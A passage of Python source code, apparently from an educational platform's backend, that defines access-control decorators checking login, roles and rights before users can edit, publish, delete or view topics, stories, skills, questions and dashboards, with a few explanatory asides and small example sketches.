has permission to make suggestions.
"""
def test_can_suggest(self, **kwargs):
"""Checks if the user can make suggestions to an exploration.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
make suggestions.
"""
if role_services.ACTION_SUGGEST_CHANGES in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to make suggestions.')
test_can_suggest.__wrapped__ = True
return test_can_suggest
def can_resubmit_suggestion(handler):
"""Decorator to check whether a user can resubmit a suggestion."""
def test_can_resubmit_suggestion(self, suggestion_id, **kwargs):
"""Checks if the user can edit the given suggestion.
Args:
suggestion_id: str. The ID of the suggestion.
**kwargs: *. The keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
InvalidInputException. No suggestion found with the given id.
UnauthorizedUserException. The user does not have credentials to
resubmit this suggestion.
"""
suggestion = suggestion_services.get_suggestion_by_id(suggestion_id)
if not suggestion:
raise self.InvalidInputException(
'No suggestion found with given suggestion id')
if suggestion_services.check_can_resubmit_suggestion(
suggestion_id, self.user_id):
return handler(self, suggestion_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to resubmit this suggestion.')
test_can_resubmit_suggestion.__wrapped__ = True
return test_can_resubmit_suggestion
def can_publish_exploration(handler):
"""Decorator to check whether user can publish exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to publish an exploration.
"""
def test_can_publish(self, exploration_id, *args, **kwargs):
"""Checks if the user can publish the exploration.
Args:
exploration_id: str. The exploration id.
*args: list(*). A list of arguments.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
publish an exploration.
"""
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_publish_activity(
self.user, exploration_rights):
return handler(self, exploration_id, *args, **kwargs)
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to publish this exploration.')
test_can_publish.__wrapped__ = True
return test_can_publish
def can_publish_collection(handler):
"""Decorator to check whether user can publish collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to publish a collection.
"""
def test_can_publish_collection(self, collection_id, **kwargs):
"""Checks if the user can publish the collection.
Args:
collection_id: str. The collection id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
publish a collection.
"""
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
if collection_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_publish_activity(
self.user, collection_rights):
return handler(self, collection_id, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to publish this collection.')
test_can_publish_collection.__wrapped__ = True
return test_can_publish_collection
def can_unpublish_collection(handler):
"""Decorator to check whether user can unpublish a given
collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks if
the user has permission to unpublish a collection.
"""
def test_can_unpublish_collection(self, collection_id, **kwargs):
"""Checks if the user can unpublish the collection.
Args:
collection_id: str. The collection id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials
to unpublish a collection.
"""
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
if collection_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_unpublish_activity(
self.user, collection_rights):
return handler(self, collection_id, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to unpublish this collection.')
test_can_unpublish_collection.__wrapped__ = True
return test_can_unpublish_collection
def can_modify_exploration_roles(handler):
"""Decorators to check whether user can manage rights related to an
exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
the user has permission to manage rights related to an
exploration.
"""
def test_can_modify(self, exploration_id, **kwargs):
"""Checks if the user can modify the rights related to an exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
change the rights for an exploration.
"""
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_modify_activity_roles(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to change rights for this '
'exploration.')
test_can_modify.__wrapped__ = True
return test_can_modify
def can_perform_cron_tasks(handler):
"""Decorator to ensure that the handler is being called by cron or by a
superadmin of the application.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also ensures that
the handler can only be executed if it is called by cron or by
a superadmin of the application.
"""
def test_can_perform(self, **kwargs):
"""Checks if the handler is called by cron or by a superadmin of the
application.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have
credentials to access the page.
"""
if (self.request.headers.get('X-AppEngine-Cron') is None and
not self.current_user_is_super_admin):
raise self.UnauthorizedUserException(
'You do not have the credentials to access this page.')
else:
return handler(self, **kwargs)
test_can_perform.__wrapped__ = True
return test_can_perform
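The cron guard keys off the `X-AppEngine-Cron` request header, which App Engine sets on requests issued by its cron service, with a super-admin escape hatch. A toy sketch of the check, using a plain dict in place of the real request headers object:

```python
class UnauthorizedUserException(Exception):
    pass

class Handler:
    """Hypothetical handler holding just the fields the check reads."""

    def __init__(self, headers, is_super_admin=False):
        self.headers = headers
        self.current_user_is_super_admin = is_super_admin

    def run_cron(self):
        # Allow the request only if it came from the cron service
        # (header present) or from a super admin triggering it by hand.
        if (self.headers.get('X-AppEngine-Cron') is None and
                not self.current_user_is_super_admin):
            raise UnauthorizedUserException(
                'You do not have the credentials to access this page.')
        return 'cron task executed'

print(Handler({'X-AppEngine-Cron': 'true'}).run_cron())  # cron task executed
```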
def can_access_learner_dashboard(handler):
"""Decorator to check access to learner dashboard.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
one can access the learner dashboard.
"""
def test_can_access(self, **kwargs):
"""Checks if the user can access the learner dashboard.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
"""
if role_services.ACTION_ACCESS_LEARNER_DASHBOARD in self.user.actions:
return handler(self, **kwargs)
else:
raise self.NotLoggedInException
test_can_access.__wrapped__ = True
return test_can_access
def can_manage_question_skill_status(handler):
"""Decorator to check whether the user can publish a question and link it
to a skill.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the
given user has permission to publish a question and link it
to a skill.
"""
def test_can_manage_question_skill_status(self, **kwargs):
"""Checks if the user can publish a question directly.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
credentials to publish a question.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if (
role_services.ACTION_MANAGE_QUESTION_SKILL_STATUS in
self.user.actions):
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to publish a question.')
test_can_manage_question_skill_status.__wrapped__ = True
return test_can_manage_question_skill_status
def require_user_id_else_redirect_to_homepage(handler):
"""Decorator that checks if a user_id is associated with the current
session. If not, the user is redirected to the main page.
Note that the user may not yet have registered.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if a given user_id is associated with the current
session.
"""
def test_login(self, **kwargs):
"""Checks if the user for the current session is logged in.
If not, redirects the user to the home page.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
"""
if not self.user_id:
self.redirect('/')
return
return handler(self, **kwargs)
test_login.__wrapped__ = True
return test_login
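Unlike the other decorators in this module, `require_user_id_else_redirect_to_homepage` redirects rather than raising. A self-contained sketch with a toy `Handler` that records redirects (the `redirected_to` attribute is purely illustrative):

```python
def require_user_id_else_redirect_to_homepage(handler):
    def test_login(self, **kwargs):
        if not self.user_id:
            self.redirect('/')
            return  # No return value; the redirect is the response.
        return handler(self, **kwargs)
    test_login.__wrapped__ = True
    return test_login

class Handler:
    """Hypothetical handler that records where it redirected."""

    def __init__(self, user_id):
        self.user_id = user_id
        self.redirected_to = None

    def redirect(self, url):
        self.redirected_to = url

    @require_user_id_else_redirect_to_homepage
    def dashboard(self):
        return 'dashboard for %s' % self.user_id

h = Handler(None)
assert h.dashboard() is None       # anonymous user gets no body...
assert h.redirected_to == '/'      # ...just a redirect to the homepage
```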
def can_edit_topic(handler):
"""Decorator to check whether the user can edit given topic."""
def test_can_edit(self, topic_id, *args, **kwargs):
"""Checks whether the user can edit a given topic.
Args:
topic_id: str. The topic id.
*args: list(*). The arguments from the calling function.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to edit a topic.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None or topic is None:
raise base.UserFacingExceptions.PageNotFoundException
if topic_services.check_can_edit_topic(self.user, topic_rights):
return handler(self, topic_id, *args, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to edit this topic.')
test_can_edit.__wrapped__ = True
return test_can_edit
def can_edit_question(handler):
"""Decorator to check whether the user can edit given question.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
whether the user has permission to edit a given question.
"""
def test_can_edit(self, question_id, **kwargs):
"""Checks whether the user can edit the given question.
Args:
question_id: str. The question id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to edit a question.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
question = question_services.get_question_by_id(
question_id, strict=False)
if question is None:
raise self.PageNotFoundException
if role_services.ACTION_EDIT_ANY_QUESTION in self.user.actions:
return handler(self, question_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to edit this question.')
test_can_edit.__wrapped__ = True
return test_can_edit
def can_play_question(handler):
"""Decorator to check whether the user can play given question.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
whether the user can play a given question.
"""
def test_can_play_question(self, question_id, **kwargs):
"""Checks whether the user can play the given question.
Args:
question_id: str. The question id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
question = question_services.get_question_by_id(
question_id, strict=False)
if question is None:
raise self.PageNotFoundException
return handler(self, question_id, **kwargs)
test_can_play_question.__wrapped__ = True
return test_can_play_question
def can_view_question_editor(handler):
"""Decorator to check whether the user can view any question editor.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if the user has permission to view any question editor.
"""
def test_can_view_question_editor(self, question_id, **kwargs):
"""Checks whether the user can view the question editor.
Args:
question_id: str. The question id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
enough rights to access the question editor.
"""
if not self.user_id:
raise self.NotLoggedInException
question = question_services.get_question_by_id(
question_id, strict=False)
if question is None:
raise self.PageNotFoundException
if role_services.ACTION_VISIT_ANY_QUESTION_EDITOR in self.user.actions:
return handler(self, question_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to access the question editor.'
% self.user_id)
test_can_view_question_editor.__wrapped__ = True
return test_can_view_question_editor
def can_delete_question(handler):
"""Decorator to check whether the user can delete a question.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if the user has permission to delete a question.
"""
def test_can_delete_question(self, question_id, **kwargs):
"""Checks whether the user can delete a given question.
Args:
question_id: str. The question id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to delete the question.
"""
if not self.user_id:
raise self.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (role_services.ACTION_DELETE_ANY_QUESTION in
user_actions_info.actions):
return handler(self, question_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to delete the'
' question.' % self.user_id)
test_can_delete_question.__wrapped__ = True
return test_can_delete_question
def can_add_new_story_to_topic(handler):
"""Decorator to check whether the user can add a story to a given topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if the user has permission to add a story to a given topic.
"""
def test_can_add_story(self, topic_id, **kwargs):
"""Checks whether the user can add a story to
a given topic.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to add a story to a given topic.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None or topic is None:
raise base.UserFacingExceptions.PageNotFoundException
if topic_services.check_can_edit_topic(self.user, topic_rights):
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to add a story to this topic.')
test_can_add_story.__wrapped__ = True
return test_can_add_story
def can_edit_story(handler):
"""Decorator to check whether the user can edit a story belonging to a given
topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
a user has permission to edit a story for a given topic.
"""
def test_can_edit_story(self, story_id, **kwargs):
"""Checks whether the user can edit a story belonging to
a given topic.
Args:
story_id: str. The story id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to edit a story belonging to a
given topic.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
story_domain.Story.require_valid_story_id(story_id)
story = story_fetchers.get_story_by_id(story_id, strict=False)
if story is None:
raise base.UserFacingExceptions.PageNotFoundException
topic_id = story.corresponding_topic_id
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
if topic_rights is None or topic is None:
raise base.UserFacingExceptions.PageNotFoundException
canonical_story_ids = topic.get_canonical_story_ids()
if story_id not in canonical_story_ids:
raise base.UserFacingExceptions.PageNotFoundException
if topic_services.check_can_edit_topic(self.user, topic_rights):
return handler(self, story_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to edit this story.')
test_can_edit_story.__wrapped__ = True
return test_can_edit_story
def can_edit_skill(handler):
"""Decorator to check whether the user can edit a skill, which can be
independent or belong to a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
the user has permission to edit a skill.
"""
def test_can_edit_skill(self, skill_id, **kwargs):
"""Test to see if user can edit a given skill by checking if
logged in and using can_user_edit_skill.
Args:
skill_id: str. The skill ID.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The given page cannot be found.
UnauthorizedUserException. The user does not have the
credentials to edit the given skill.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if role_services.ACTION_EDIT_SKILLS in self.user.actions:
return handler(self, skill_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to edit this skill.')
test_can_edit_skill.__wrapped__ = True
return test_can_edit_skill
def can_delete_skill(handler):
"""Decorator to check whether the user can delete a skill.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if the user can delete a skill.
"""
def test_can_delete_skill(self, **kwargs):
"""Checks whether the user can delete a skill.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
credentials to delete a skill.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if role_services.ACTION_DELETE_ANY_SKILL in user_actions_info.actions:
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to delete the skill.')
test_can_delete_skill.__wrapped__ = True
return test_can_delete_skill
def can_create_skill(handler):
"""Decorator to check whether the user can create a skill, which can be
independent or added to a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
the user has permission to create a skill.
"""
def test_can_create_skill(self, **kwargs):
"""Checks whether the user can create a skill, which can be
independent or belong to a topic.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
credentials to create a skill.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if role_services.ACTION_CREATE_NEW_SKILL in user_actions_info.actions:
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to create a skill.')
test_can_create_skill.__wrapped__ = True
return test_can_create_skill
def can_delete_story(handler):
"""Decorator to check whether the user can delete a story in a given
topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
whether the user has permission to delete a story in a
given topic.
"""
def test_can_delete_story(self, story_id, **kwargs):
"""Checks whether the user can delete a story in
a given topic.
Args:
story_id: str. The story ID.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to delete a story.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
story = story_fetchers.get_story_by_id(story_id, strict=False)
if story is None:
raise base.UserFacingExceptions.PageNotFoundException
topic_id = story.corresponding_topic_id
topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None or topic is None:
raise base.UserFacingExceptions.PageNotFoundException
if topic_services.check_can_edit_topic(self.user, topic_rights):
return handler(self, story_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to delete this story.')
test_can_delete_story.__wrapped__ = True
return test_can_delete_story
def can_delete_topic(handler):
"""Decorator to check whether the user can delete a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also
checks if the user can delete a given topic.
"""
def test_can_delete_topic(self, topic_id, **kwargs):
"""Checks whether the user can delete a given topic.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to delete a given topic.
"""
if not self.user_id:
raise self.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
user_actions_info = user_services.get_user_actions_info(self.user_id)
if role_services.ACTION_DELETE_TOPIC in user_actions_info.actions:
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to delete the'
' topic.' % self.user_id)
test_can_delete_topic.__wrapped__ = True
return test_can_delete_topic
def can_create_topic(handler):
"""Decorator to check whether the user can create a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks
if the user can create a topic.
"""
def test_can_create_topic(self, **kwargs):
"""Checks whether the user can create a topic.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to create a topic.
"""
if not self.user_id:
raise self.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if role_services.ACTION_CREATE_NEW_TOPIC in user_actions_info.actions:
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to create a'
' topic.' % self.user_id)
test_can_create_topic.__wrapped__ = True
return test_can_create_topic
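Several decorators in this stretch share a second pattern: look up the user's granted role actions and test set membership before delegating. A reduced sketch of that flow, with a hypothetical in-memory user-actions store standing in for `user_services.get_user_actions_info`:

```python
ACTION_CREATE_NEW_TOPIC = 'CREATE_NEW_TOPIC'

# Hypothetical store mapping user ids to their granted role actions.
USER_ACTIONS = {'admin1': {ACTION_CREATE_NEW_TOPIC}, 'learner1': set()}

class NotLoggedInException(Exception):
    pass

class UnauthorizedUserException(Exception):
    pass

def get_user_actions_info(user_id):
    """Toy stand-in for the real user_services lookup."""
    return USER_ACTIONS.get(user_id, set())

def can_create_topic(user_id):
    # Mirror the decorator's order of checks: login first, then action.
    if not user_id:
        raise NotLoggedInException
    if ACTION_CREATE_NEW_TOPIC in get_user_actions_info(user_id):
        return True
    raise UnauthorizedUserException(
        '%s does not have enough rights to create a topic.' % user_id)

assert can_create_topic('admin1') is True
```

Checking membership in a set of action strings keeps the decorators role-agnostic: granting a role only needs to add actions to the user's set.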
def can_access_topics_and_skills_dashboard(handler):
"""Decorator to check whether the user can access the topics and skills
dashboard.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks if
the user can access the topics and skills dashboard.
"""
def test_can_access_topics_and_skills_dashboard(self, **kwargs):
"""Checks whether the user can access the topics and skills
dashboard.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to access the topics and skills
dashboard.
"""
if not self.user_id:
raise self.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
role_services.ACTION_ACCESS_TOPICS_AND_SKILLS_DASHBOARD in
user_actions_info.actions):
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to access the topics and skills'
' dashboard.' % self.user_id)
test_can_access_topics_and_skills_dashboard.__wrapped__ = True
return test_can_access_topics_and_skills_dashboard
def can_view_any_topic_editor(handler):
"""Decorator to check whether the user can view any topic editor.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks
if the user can view any topic editor.
"""
def test_can_view_any_topic_editor(self, topic_id, **kwargs):
"""Checks whether the user can view any topic editor.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to view any topic editor.
"""
if not self.user_id:
raise self.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
role_services.ACTION_VISIT_ANY_TOPIC_EDITOR in
user_actions_info.actions):
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to view any topic editor.'
% self.user_id)
test_can_view_any_topic_editor.__wrapped__ = True
return test_can_view_any_topic_editor
def can_manage_rights_for_topic(handler):
"""Decorator to check whether the user can manage a topic's rights.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks
if the user can manage a given topic's rights.
"""
def test_can_manage_topic_rights(self, topic_id, **kwargs):
"""Checks whether the user can manage a topic's rights.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to assign roles for a given topic.
"""
if not self.user_id:
raise self.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
role_services.ACTION_MANAGE_TOPIC_RIGHTS in
user_actions_info.actions):
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to assign roles for the '
'topic.' % self.user_id)
test_can_manage_topic_rights.__wrapped__ = True
return test_can_manage_topic_rights
def can_change_topic_publication_status(handler):
"""Decorator to check whether the user can publish or unpublish a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can publish or unpublish a topic.
"""
def test_can_change_topic_publication_status(self, topic_id, **kwargs):
"""Checks whether the user can can publish or unpublish a topic.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to publish or unpublish the topic.
"""
if not self.user_id:
raise self.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
role_services.ACTION_CHANGE_TOPIC_STATUS in
user_actions_info.actions):
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to publish or unpublish the '
'topic.' % self.user_id)
test_can_change_topic_publication_status.__wrapped__ = True
return test_can_change_topic_publication_status
def can_access_topic_viewer_page(handler):
"""Decorator to check whether user can access topic viewer page.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can access the given topic viewer page.
"""
def test_can_access(
self, classroom_url_fragment, topic_url_fragment, **kwargs):
"""Checks if the user can access topic viewer page.
Args:
classroom_url_fragment: str. The classroom url fragment.
topic_url_fragment: str. The url fragment of the topic.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
if topic_url_fragment != topic_url_fragment.lower():
_redirect_based_on_return_type(
self, '/learn/%s/%s' % (
classroom_url_fragment,
topic_url_fragment.lower()),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
topic = topic_fetchers.get_topic_by_url_fragment(
topic_url_fragment)
if topic is None:
_redirect_based_on_return_type(
self, '/learn/%s' % classroom_url_fragment,
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
verified_classroom_url_fragment = (
classroom_services.get_classroom_url_fragment_for_topic_id(
topic.id))
if classroom_url_fragment != verified_classroom_url_fragment:
url_substring = topic_url_fragment
_redirect_based_on_return_type(
self, '/learn/%s/%s' % (
verified_classroom_url_fragment,
url_substring),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
topic_id = topic.id
topic_rights = topic_fetchers.get_topic_rights(
topic_id, strict=False)
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
topic_rights.topic_is_published or
role_services.ACTION_VISIT_ANY_TOPIC_EDITOR in
user_actions_info.actions):
return handler(self, topic.name, **kwargs)
else:
raise self.PageNotFoundException
test_can_access.__wrapped__ = True
return test_can_access
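The viewer-page decorators normalise URL fragments before doing any lookup: a fragment containing uppercase characters triggers a redirect to the canonical lowercase URL. That first step can be isolated as a small pure function (the name below is illustrative, not part of the module):

```python
def canonical_topic_url(classroom_url_fragment, topic_url_fragment):
    """Returns the canonical redirect target if the topic fragment is
    not already lowercase, otherwise None (meaning: no redirect needed).
    """
    if topic_url_fragment != topic_url_fragment.lower():
        return '/learn/%s/%s' % (
            classroom_url_fragment, topic_url_fragment.lower())
    return None

# Mixed-case fragment: redirect to the lowercase canonical URL.
assert canonical_topic_url('math', 'Fractions') == '/learn/math/fractions'
# Already canonical: proceed to the topic lookup instead.
assert canonical_topic_url('math', 'fractions') is None
```

Doing the case check before any datastore fetch means a single canonical URL is indexed and cached, no matter how the link was typed.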
def can_access_story_viewer_page(handler):
"""Decorator to check whether user can access story viewer page.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can access the given story viewer page.
"""
def test_can_access(
self, classroom_url_fragment, topic_url_fragment,
story_url_fragment, *args, **kwargs):
"""Checks if the user can access story viewer page.
Args:
classroom_url_fragment: str. The classroom url fragment.
topic_url_fragment: str. The url fragment of the topic
associated with the story.
story_url_fragment: str. The story url fragment.
*args: list(*). A list of arguments from the calling function.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
if story_url_fragment != story_url_fragment.lower():
_redirect_based_on_return_type(
self, '/learn/%s/%s/story/%s' % (
classroom_url_fragment,
topic_url_fragment,
story_url_fragment.lower()),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
story = story_fetchers.get_story_by_url_fragment(story_url_fragment)
if story is None:
_redirect_based_on_return_type(
self,
'/learn/%s/%s/story' %
(classroom_url_fragment, topic_url_fragment),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
story_is_published = False
topic_is_published = False
topic_id = story.corresponding_topic_id
story_id = story.id
user_actions_info = user_services.get_user_actions_info(self.user_id)
if topic_id:
topic = topic_fetchers.get_topic_by_id(topic_id)
if topic.url_fragment != topic_url_fragment:
_redirect_based_on_return_type(
self,
'/learn/%s/%s/story/%s' % (
classroom_url_fragment,
topic.url_fragment,
story_url_fragment),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
verified_classroom_url_fragment = (
classroom_services.get_classroom_url_fragment_for_topic_id(
topic.id))
if classroom_url_fragment != verified_classroom_url_fragment:
url_substring = '%s/story/%s' % (
topic_url_fragment, story_url_fragment)
_redirect_based_on_return_type(
self, '/learn/%s/%s' % (
verified_classroom_url_fragment,
url_substring),
